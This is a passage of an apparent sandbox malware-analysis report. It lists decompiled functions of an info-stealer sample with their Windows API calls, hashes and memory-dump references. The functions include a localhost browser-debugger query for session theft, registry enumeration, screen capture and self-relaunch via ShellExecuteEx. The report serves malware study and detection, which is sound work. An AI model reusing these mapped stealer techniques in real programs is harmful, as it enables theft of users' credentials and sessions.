                            • Opcode ID: 54fd6b4101e54fcaff21c8b2bbc925d73c6c920cdd7f735f680c634394625b48
                            • Instruction ID: 5ef5ed515bcfbe503b6cf3b01cc815a057f707242bdb9d3eea3c45608abe5b96
                            • Opcode Fuzzy Hash: 54fd6b4101e54fcaff21c8b2bbc925d73c6c920cdd7f735f680c634394625b48
                            • Instruction Fuzzy Hash: 13B18EB2D10299AFCB10EFB4DC989EE77B9FF48300F548564EA05E7241DA709E45CB91
                            Function 008EB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EB330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EB3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB3D9
                            • lstrlen.KERNEL32(00914C54), ref: 008EB450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB474
                            • lstrcat.KERNEL32(00000000,00914C54), ref: 008EB480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB4A9
                            • lstrlen.KERNEL32(00000000), ref: 008EB52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EB55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB587
                            • lstrlen.KERNEL32(00914ADC), ref: 008EB5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB622
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008EB62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB65E
                            • lstrlen.KERNEL32(?), ref: 008EB767
                            • lstrlen.KERNEL32(?), ref: 008EB776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EB79E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 398e9dab436d5cb63658e706d102519065b163e1bbd5ef0612fd4865bea8009b
                            • Instruction ID: fe3d63e495b8a156b0c62a4d11bb0724839c95227296352aea4fd7266f45e2a9
                            • Opcode Fuzzy Hash: 398e9dab436d5cb63658e706d102519065b163e1bbd5ef0612fd4865bea8009b
                            • Instruction Fuzzy Hash: C3029330A01285DFCB25DF6AD949AABB7F5FF46714F188069E409DB261DB71DC82CB80
                            Function 00903930 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            • RegOpenKeyExA.ADVAPI32(?,012F8FA0,00000000,00020019,?), ref: 0090398D
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009039C7
                            • wsprintfA.USER32 ref: 009039F2
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00903A10
                            • RegCloseKey.ADVAPI32(?), ref: 00903A1E
                            • RegCloseKey.ADVAPI32(?), ref: 00903A28
                            • RegQueryValueExA.ADVAPI32(?,012FF630,00000000,000F003F,?,?), ref: 00903A71
                            • lstrlen.KERNEL32(?), ref: 00903A86
                            • RegQueryValueExA.ADVAPI32(?,012FF5B8,00000000,000F003F,?,00000400), ref: 00903AF7
                            • RegCloseKey.ADVAPI32(?), ref: 00903B42
                            • RegCloseKey.ADVAPI32(?), ref: 00903B59
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 989ab7ddaaffb0df92ce28c4db6af4d3d1ce8eecd9f74a678227caacc0b35ba1
                            • Instruction ID: 2b59bebc75114a32e53c17036cc247f777b2e486249904799a65d34ce2141943
                            • Opcode Fuzzy Hash: 989ab7ddaaffb0df92ce28c4db6af4d3d1ce8eecd9f74a678227caacc0b35ba1
                            • Instruction Fuzzy Hash: 7C919E72D002589FCB10DFA4DC84AEEB7BDFB88314F15C569E509A7291DB31AE46CB90
                            Function 008E90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E90DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E90FC
                            • InternetCloseHandle.WININET(00000000), ref: 008E9109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 008E9166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 008E9197
                            • InternetCloseHandle.WININET(00000000), ref: 008E91A2
                            • InternetCloseHandle.WININET(00000000), ref: 008E91A9
                            • strlen.MSVCRT ref: 008E91BA
                            • strlen.MSVCRT ref: 008E91ED
                            • strlen.MSVCRT ref: 008E922E
                            • strlen.MSVCRT ref: 008E924C
                              • Part of subcall function 008E8980: std::_Xinvalid_argument.LIBCPMT ref: 008E8996
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 1c07c382440a3c06ac998c8c0bf60c28750d1f634380730be5e80b679900f3fb
                            • Instruction ID: 00639766d1565f34e3b0ee2d5a4d1b4b8ea55f473062fecd9b6944c886b7d0e9
                            • Opcode Fuzzy Hash: 1c07c382440a3c06ac998c8c0bf60c28750d1f634380730be5e80b679900f3fb
                            • Instruction Fuzzy Hash: 4A51F771740249ABDB20DBA8DC45BEEB7F9EF88710F140569F505E3280DBB4DA4587A2
                            Function 00901830 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00901871
                            • lstrcpy.KERNEL32(00000000,012EA840), ref: 0090189C
                            • lstrlen.KERNEL32(?), ref: 009018A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009018C6
                            • lstrcat.KERNEL32(00000000,?), ref: 009018D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009018FA
                            • lstrlen.KERNEL32(012FEB28), ref: 0090190F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00901932
                            • lstrcat.KERNEL32(00000000,012FEB28), ref: 0090193A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901962
                            • ShellExecuteEx.SHELL32(?), ref: 0090199D
                            • ExitProcess.KERNEL32 ref: 009019D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: a1af46575304b8881caacd125ba18cd448ef814b71ab0c5467da73b9ebfa78e2
                            • Instruction ID: 07f39e94539c7c7a734f11c4691f6cc9b40e3aca4bc0eeb8fc5ddc30b338bb3c
                            • Opcode Fuzzy Hash: a1af46575304b8881caacd125ba18cd448ef814b71ab0c5467da73b9ebfa78e2
                            • Instruction Fuzzy Hash: E4513B71901259AFDB21EFA9DC94ADEBBFDBF48300F548125A915E3291DF70AF018B90
                            Function 008FF190 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF1C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF1F2
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008FF206
                            • lstrlen.KERNEL32(00000000), ref: 008FF215
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 008FF233
                            • StrStrA.SHLWAPI(00000000,?), ref: 008FF261
                            • lstrlen.KERNEL32(?), ref: 008FF274
                            • lstrlen.KERNEL32(00000000), ref: 008FF292
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF2DF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF31F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 2cb42e562e904be733e2c5a798c4435e13f7bdc3c5064c9c5cd56ef168b67abf
                            • Instruction ID: e3bd54b9d4c9a94419b496d41cc317d73ea2a9637b51ae03876d7d10ae6bb373
                            • Opcode Fuzzy Hash: 2cb42e562e904be733e2c5a798c4435e13f7bdc3c5064c9c5cd56ef168b67abf
                            • Instruction Fuzzy Hash: 9051BF36A101999FCB22AF39DC49ABE77A8FF45710F044574EA1ADB252DB70DC018791
                            Function 008EA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(012F9100,00B19BD8,0000FFFF), ref: 008EA026
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EA053
                            • lstrlen.KERNEL32(00B19BD8), ref: 008EA060
                            • lstrcpy.KERNEL32(00000000,00B19BD8), ref: 008EA08A
                            • lstrlen.KERNEL32(00914C50), ref: 008EA095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA0B2
                            • lstrcat.KERNEL32(00000000,00914C50), ref: 008EA0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EA0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA114
                            • SetEnvironmentVariableA.KERNEL32(012F9100,00000000), ref: 008EA12F
                            • LoadLibraryA.KERNEL32(012E6458), ref: 008EA143
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: f0fb3b7f92b05585ae6c4041c83e453e3566e001facc99cf1baa446f95b0d27e
                            • Instruction ID: 3c3f4c60cd1ebfb797145d76bf9b7ee2abf7e121caff0b814bc4227b8aee16f9
                            • Opcode Fuzzy Hash: f0fb3b7f92b05585ae6c4041c83e453e3566e001facc99cf1baa446f95b0d27e
                            • Instruction Fuzzy Hash: F491E531600A809FD7349FBADC84AA637A5FB56B04F808428E505D7261EFB5ED80CB93
                            Function 008FCA30 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FCA92
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FCAC1
                            • lstrlen.KERNEL32(00000000), ref: 008FCAEC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FCB22
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008FCB33
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: e1ff8144c709c0fa8ae1b253d68c34fe7a518dcb11d1e499e31fbab79b7216ce
                            • Instruction ID: 3f537d5843f8821d157aba715aab75976da52acb57e5876ec5b9291914edf8b1
                            • Opcode Fuzzy Hash: e1ff8144c709c0fa8ae1b253d68c34fe7a518dcb11d1e499e31fbab79b7216ce
                            • Instruction Fuzzy Hash: 3561C47190026EAFCB10DFB5CA85AFE7BB8FF09700F044565E945E7201EB749E418791
                            Function 009043F0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00900EC0), ref: 00904486
                            • GetDesktopWindow.USER32 ref: 00904490
                            • GetWindowRect.USER32(00000000,?), ref: 0090449D
                            • SelectObject.GDI32(00000000,00000000), ref: 009044CF
                            • GetHGlobalFromStream.COMBASE(00900EC0,?), ref: 00904546
                            • GlobalLock.KERNEL32(?), ref: 00904550
                            • GlobalSize.KERNEL32(?), ref: 0090455D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 01ccab1df1ef228f1571792ac6d798eb0830c808a8498a319f132028d6edb90b
                            • Instruction ID: b63e92b71209ec248f7ac875cdb91695328b2a90166d1d6719602de62083a185
                            • Opcode Fuzzy Hash: 01ccab1df1ef228f1571792ac6d798eb0830c808a8498a319f132028d6edb90b
                            • Instruction Fuzzy Hash: 36511C75A10208AFDB10DFA8DD89EEEB7B9FF48700F504529F905E7250DA74AE01CBA1
                            Function 008FE180 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,012FF768), ref: 008FE1ED
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FE217
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE24F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE25D
                            • lstrcat.KERNEL32(?,?), ref: 008FE278
                            • lstrcat.KERNEL32(?,?), ref: 008FE28C
                            • lstrcat.KERNEL32(?,012EA7F0), ref: 008FE2A0
                            • lstrcat.KERNEL32(?,?), ref: 008FE2B4
                            • lstrcat.KERNEL32(?,012FE380), ref: 008FE2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FE306
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
